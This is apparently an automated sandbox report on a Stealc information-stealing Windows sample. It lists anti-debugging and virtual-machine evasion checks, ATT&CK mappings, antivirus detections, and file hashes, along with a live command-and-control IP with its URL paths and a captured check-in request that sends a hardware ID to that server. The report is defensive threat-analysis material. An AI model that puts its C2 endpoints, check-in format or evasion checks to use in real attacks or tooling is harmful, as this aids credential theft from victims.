              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006216A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006216B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00641BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00641BF0
Source: file.exe, file.exe, 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2196277198.00000000012F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196277198.00000000012C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25682)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25535)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25690)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25554)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00624A60 VirtualProtect 00000000,00000004,00000100,? 0_2_00624A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00646390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00646390 mov eax, dword ptr fs:[00000030h] 0_2_00646390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00642A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00642A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 2812, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00644610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00644610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006446A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_006446A0
Source: file.exe | Binary or memory string: oProgram Manager
Source: file.exe, 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: oProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00642D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00642B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00642B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00642A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00642A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00642C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00642C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2812, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2812, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the count the report shows for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (sample)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Antivirus detection (URLs)
Source | Detection | Scanner | Label
http://185.215.113.206/ba | 100% | Avira URL Cloud | malware
http://185.215.113.206/ka | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php/ya | 100% | Avira URL Cloud | malware
http://185.215.113.206/Sa | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00 | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php | 100% | Avira URL Cloud | malware
http://185.215.113.206/tingsLMEM8 | 100% | Avira URL Cloud | malware
              No contacted domains info
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php | true | Avira URL Cloud: malware | unknown
http://185.215.113.206/ | false | | high

URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00 | file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/ka | file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpS | file.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/tingsLMEM8 | file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/ba | file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/Sa | file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php/ya | file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpg | file.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1560037
                        Start date and time:2024-11-21 10:36:12 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:2
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 117
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                        • VT rate limit hit for: file.exe
                        No simulations
Context (IPs)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/68b591d6548ec281/sqlite3.dll
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
No context

Context (ASNs)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.943084677677914
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'760'768 bytes
                        MD5:e1dcc0eabbbedc586e3f5fd45f8735d0
                        SHA1:b434195b6c7d5a4d5960840d18df55cc1fc3ff79
                        SHA256:e20885cb4967e6f72d4c70dcb97c1fd19aefff88972723b266483a09966916ca
                        SHA512:ef01d622cacef1786a620a25d13bb02280282abf83e5c814bdd22aaf33f222ca88e4af050f0b86ffb82c2b4f21d10661a51008b2de19a2b14085038d046a6254
                        SSDEEP:49152:g7Hqe25z6iBj0ylizFsHZubjhgRwacIj3qeSjikp:gmeTylHZublgRwajCjikp
                        TLSH:66853390CFCE3AD5DC9CE2BBE22F2240277DAB99F184AE5C460E24754817FFCA694511
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0xa76000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FF7B051A83Ah
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        (empty) | 0x1000 | 0x249000 | 0x16200 | 7cb15b74c7704c70e27c7f570f19b1e6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x24a000 | 0x1ac | 0x200 | 0ad0707a384aefc7a74caab660b57200 | False | 0.58203125 | data | 4.591732776412112 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        (empty) | 0x24c000 | 0x295000 | 0x200 | ac26d0bc1ed02701fb094274de0cf8db | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        kerxdhhv | 0x4e1000 | 0x194000 | 0x193e00 | 5f9c7c928d49cfa301999b5e4f78fc63 | False | 0.9947445160167131 | data | 7.952968465504712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        dedzcksa | 0x675000 | 0x1000 | 0x600 | 007a32d17b9231142d6fdda3fde1099e | False | 0.5390625 | data | 4.882361359688378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant | 0x676000 | 0x3000 | 0x2200 | 9ac1261fe22c24109bba2206dc6cf1c6 | False | 0.07134650735294118 | DOS executable (COM) | 0.7724505209662605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_MANIFEST | 0x674b00 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                        DLL | Import
                        kernel32.dll | lstrcpy
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-11-21T10:37:16.839004+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49706 | 185.215.113.206 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 21, 2024 10:37:14.809145927 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 21, 2024 10:37:14.928740025 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.5
                        Nov 21, 2024 10:37:14.928822994 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 21, 2024 10:37:14.929044008 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 21, 2024 10:37:15.049299002 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.5
                        Nov 21, 2024 10:37:16.362616062 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.5
                        Nov 21, 2024 10:37:16.362714052 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 21, 2024 10:37:16.374242067 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 21, 2024 10:37:16.493957043 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.5
                        Nov 21, 2024 10:37:16.838920116 CET | 80 | 49706 | 185.215.113.206 | 192.168.2.5
                        Nov 21, 2024 10:37:16.839004040 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 21, 2024 10:37:20.760255098 CET | 49706 | 80 | 192.168.2.5 | 185.215.113.206
                        • 185.215.113.206
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49706 | 185.215.113.206 | 80 | 2812 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 21, 2024 10:37:14.929044008 CET | 90 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Nov 21, 2024 10:37:16.362616062 CET | 203 | IN | HTTP/1.1 200 OK
                        Date: Thu, 21 Nov 2024 09:37:16 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Nov 21, 2024 10:37:16.374242067 CET | 412 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCA
                        Host: 185.215.113.206
                        Content-Length: 210
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 43 41 31 43 44 42 33 39 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a
                        Data Ascii:
                        ------BAFIEGIECGCBKFIEBGCA
                        Content-Disposition: form-data; name="hwid"

                        20CA1CDB3918194301792
                        ------BAFIEGIECGCBKFIEBGCA
                        Content-Disposition: form-data; name="build"

                        mars
                        ------BAFIEGIECGCBKFIEBGCA--
                        Nov 21, 2024 10:37:16.838920116 CET | 210 | IN | HTTP/1.1 200 OK
                        Date: Thu, 21 Nov 2024 09:37:16 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Target ID:0
                        Start time:04:37:10
                        Start date:21/11/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x620000
                        File size:1'760'768 bytes
                        MD5 hash:E1DCC0EABBBEDC586E3F5FD45F8735D0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:5.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:16.2%
                          Total number of Nodes:1410
                          Total number of Limit Nodes:28
